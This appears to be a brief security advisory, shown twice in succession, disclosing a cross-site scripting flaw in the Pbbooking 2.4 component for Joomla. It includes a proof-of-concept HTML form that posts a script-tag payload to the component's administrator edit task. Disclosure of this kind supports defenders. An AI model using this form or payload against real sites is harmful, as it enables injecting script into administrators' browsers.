Hello,
Cross-site
scripting (XSS) vulnerability in the Pbbooking 2.4 component
for Joomla! allows remote attackers to inject arbitrary web script or HTML via POST request to manage.php.
POC:
<form action="http://site/joomla/administrator/index.php?option=com_pbbooking&controller=manage&task=edit"
method="post">
<input
type="text" name="id" value="1" />
<input
type="text" name="date" value="1" />
<input type="text"
name="xss" value="<script>alert('XSS')</script>"
/>
<input
type="submit" name="submit2" value="Submit" />
</form>
Best regards.
Cross-site
scripting (XSS) vulnerability in the Pbbooking 2.4 component
for Joomla! allows remote attackers to inject arbitrary web script or HTML via POST request to manage.php.
POC:
<form action="http://site/joomla/administrator/index.php?option=com_pbbooking&controller=manage&task=edit"
method="post">
<input
type="text" name="id" value="1" />
<input
type="text" name="date" value="1" />
<input type="text"
name="xss" value="<script>alert('XSS')</script>"
/>
<input
type="submit" name="submit2" value="Submit" />
</form>
Best regards.